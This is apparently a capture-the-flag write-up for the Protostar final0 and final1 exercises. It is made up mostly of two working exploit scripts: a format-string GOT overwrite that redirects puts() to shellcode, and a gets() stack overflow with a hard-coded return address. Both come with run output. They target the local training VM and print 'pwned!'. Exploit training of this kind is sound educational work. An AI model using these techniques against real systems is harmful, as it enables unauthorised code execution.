Exploit Exercises Protostar — final1

user@protostar:~$ cat final1.py
#!/usr/bin/python

import socket
import struct

# Obviously I'm doing this from the Protostar VM itself. Keep that in mind in
# case you would want to do that via network (offsets in writing will be
# different)
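HOST = "127.0.0.1"
PORT = 2994

# The wire payload is one "username ..." line followed by one "login ..." line;
# both are built first, then sent in a single send() below.

# --- "username" line ---------------------------------------------------------
# Four little-endian addresses, one for each byte of the GOT entry of puts()
# (0x0804a194, 0x0804a195, 0x0804a196, 0x0804a197). They are the targets of the
# four %n writes in the "login" line. The "----" fillers are the original
# author's spacing; presumably they keep each address on its own %p slot —
# verify against the %p count in `login` if the offsets are ever changed.
username = "username "
username += "-\x94\xa1\x04\x08----\x95\xa1\x04\x08----\x96\xa1\x04\x08----\x97\xa1\x04\x08"
# Shellcode placed inside the global username[] array. Its final chunk is the
# literal "pwned!\n" (0x70 0x77 0x6e 0x65 0x64 0x21 0x0a), which is what the
# server echoes back once the redirected puts() runs it (see the transcript).
username += "\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2"
username += "\x07\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\xe2\xff\xff\xff"
username += "\x70\x77\x6e\x65\x64\x21\x0a"
# The trailing newline is crucial: the server reads this line with fgets().
username += '\n'

# --- "login" line ------------------------------------------------------------
# Format-string write. The four %n writes store the new target address into the
# puts() GOT entry one byte at a time (LSB first, MSB last). The target is the
# shellcode inside username[]; username[] is a global, so its address is static
# (ret-addr = 0x804a23d, already including the shellcode's offset within the
# array). The %Np field widths set the running character count for each %n.
login = "login "
login += "%p" * 13 + "%75p" + "%n"  # 1st write, LSB of puts() ptr from GOT
login += "%101p" + "%n"             # 2nd write, middle byte of puts() ptr from GOT
login += "%98p" + "%n"              # 3rd write, middle byte of puts() ptr from GOT
login += "%260p" + "%n"             # 4th write, MSB of puts() ptr from GOT
login += '\n'

# NOTE(review): every address and width above was tuned on the Protostar VM
# itself; over the network the offsets differ (see the note at the top), so
# the numbers are target-specific, not a general recipe. From a hardening
# viewpoint the technique needs a writable GOT and a fixed, non-randomised
# layout — presumably full RELRO and PIE/ASLR on the target remove that
# assumption; confirm against the binary's build flags.

s = socket.socket()
try:
    s.connect((HOST, PORT))
    print(s.recv(1024))  # First prompt from the server

    # DEBUG output is printed after the prompt, matching the original order.
    print("[*] DEBUG: sizeof(username) == " + str(len(username)))
    print("[*] DEBUG: sizeof(login) == " + str(len(login)))

    payload = username + login
    print("[+] Sending payload:\n" + "\"" + payload + "\"" + " (length = " + str(len(payload)) + ")")
    # sendall() retries until the whole buffer is written; send() may return
    # after a partial write, which would silently truncate the payload.
    s.sendall(payload)
    print(s.recv(1024))
    print(s.recv(1024))
finally:
    # Release the socket even when connect()/recv() raises; the original only
    # closed it on the happy path.
    s.close()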
user@protostar:~$ chmod +x final1.py
user@protostar:~$ ./final1.py
[final1] $
[*] DEBUG: sizeof(username) == 78
[*] DEBUG: sizeof(login) == 59
[+] Sending payload:
"username -��----��----��----���1�1�1�1Ұ�Y�̀1�1۰̀�����pwned!

login %p%p%p%p%p%p%p%p%p%p%p%p%p%75p%n%101p%n%98p%n%260p%n
" (length = 137)
[final1] $
[final1] $ pwned!

It was easy but debugging was a major PITA. (Done via dmesg and /tmp/core-files in gdb.)

Steps were as follows:

1. Establish a communication channel (i.e., properly hit the logit() function)
2. Initial crash
3. Start peeking at memory (writing via %n and inspecting faulty instructions via dmesg)
4. Craft an exploit

Exploit Exercises Protostar — final0

Classic stack-based buffer overflow via gets(). Nothing fancy here.

user@protostar:~$ cat final0.py
#!/usr/bin/python

import socket
import struct

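HOST = "127.0.0.1"
PORT = 2995

# Stack-based overflow of the gets() buffer. 532 filler bytes are followed by
# the 4-byte return address (little-endian 0xbffffcd0, a stack address) and
# then the shellcode it points at; the last chunk is the literal "pwned!\n".
# NOTE(review): both the filler length and the return address were taken from
# core files on the Protostar VM (see the note below the listing), so they
# assume that exact, non-randomised stack layout and are target-specific.
payload = "a" * 532  # same bytes as the original append loop, built in one step
payload += "\xd0\xfc\xff\xbf"  # ret-addr (we're returning to stack-based shellcode)
payload += "\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2"
payload += "\x07\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\xe2\xff\xff\xff"
payload += "\x70\x77\x6e\x65\x64\x21\x0a"

s = socket.socket()
try:
    s.connect((HOST, PORT))
    # sendall() guarantees the full buffer goes out; send() may write only part.
    s.sendall(payload)
    print(s.recv(1024))
finally:
    # Close the socket even if connect()/recv() raises; the original skipped
    # close() on any error.
    s.close()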
user@protostar:~$ chmod +x final0.py
user@protostar:~$ ./final0.py
pwned!

RET was deduced from the core files.